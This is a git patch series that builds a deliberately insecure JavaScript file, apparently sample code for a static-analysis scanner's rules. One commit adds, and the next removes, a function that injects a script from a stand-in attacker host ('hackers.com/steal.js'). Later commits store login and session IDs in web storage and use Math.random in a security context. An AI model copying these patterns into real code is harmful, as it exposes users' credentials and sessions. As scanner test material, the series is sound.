From b917e5745e123cd28b5beb67a30966e87c85ddc2 Mon Sep 17 00:00:00 2001 From: "J.P. Weiser" Date: Tue, 11 Feb 2020 07:22:32 -0600 Subject: [PATCH 1/5] Add vulnerable JS code --- public/vulnerable.js | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 public/vulnerable.js diff --git a/public/vulnerable.js b/public/vulnerable.js new file mode 100644 index 0000000..6069bf1 --- /dev/null +++ b/public/vulnerable.js @@ -0,0 +1,7 @@ +function include(url) { + var s = document.createElement("script"); + s.setAttribute("type", "text/javascript"); + s.setAttribute("src", url); + document.body.appendChild(s); +} +include("http://hackers.com/steal.js") // Noncompliant From d1e4d05374c4ff93bddc5f29caa9d1614df9b8a1 Mon Sep 17 00:00:00 2001 From: "J.P. Weiser" Date: Tue, 11 Feb 2020 07:26:17 -0600 Subject: [PATCH 2/5] Update vulnerable.js --- public/vulnerable.js | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/public/vulnerable.js b/public/vulnerable.js index 6069bf1..0c0ff16 100644 --- a/public/vulnerable.js +++ b/public/vulnerable.js @@ -1,7 +1 @@ -function include(url) { - var s = document.createElement("script"); - s.setAttribute("type", "text/javascript"); - s.setAttribute("src", url); - document.body.appendChild(s); -} -include("http://hackers.com/steal.js") // Noncompliant +var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024); From e91b27bf087d3512f173ece06510ad9c1f85bac6 Mon Sep 17 00:00:00 2001 From: "J.P. Weiser" Date: Tue, 11 Feb 2020 07:29:25 -0600 Subject: [PATCH 3/5] Update vulnerable.js --- public/vulnerable.js | 3 +++ 1 file changed, 3 insertions(+) diff --git a/public/vulnerable.js b/public/vulnerable.js index 0c0ff16..ef5f4fa 100644 --- a/public/vulnerable.js +++ b/public/vulnerable.js @@ -1 +1,4 @@ var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024); + +const val = Math.random(); // Sensitive +// Check if val is used in a security context. From 38a62d7ac4decf35c579f88a3b078ad5dc305cc8 Mon Sep 17 00:00:00 2001 From: "J.P. Weiser" Date: Tue, 11 Feb 2020 07:31:28 -0600 Subject: [PATCH 4/5] Update vulnerable.js --- public/vulnerable.js | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/public/vulnerable.js b/public/vulnerable.js index ef5f4fa..3fe79f1 100644 --- a/public/vulnerable.js +++ b/public/vulnerable.js @@ -1,4 +1,9 @@ -var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024); +for (i = 1; i<5; i++) { + // Print i to the Output window. + Debug.write("loop index is " + i); + // Wait for user to resume. + debugger; +} const val = Math.random(); // Sensitive // Check if val is used in a security context. From 26a6e9e7ad348c3e3c32187df58b034de9005827 Mon Sep 17 00:00:00 2001 From: "J.P. Weiser" Date: Tue, 11 Feb 2020 07:36:18 -0600 Subject: [PATCH 5/5] Update vulnerable.js --- public/vulnerable.js | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/public/vulnerable.js b/public/vulnerable.js index 3fe79f1..39a3407 100644 --- a/public/vulnerable.js +++ b/public/vulnerable.js @@ -5,5 +5,12 @@ for (i = 1; i<5; i++) { debugger; } +localStorage.setItem("login", login); +sessionStorage.setItem("sessionId", sessionId); + +if(unexpectedCondition) { + alert("Unexpected Condition"); +} + const val = Math.random(); // Sensitive // Check if val is used in a security context.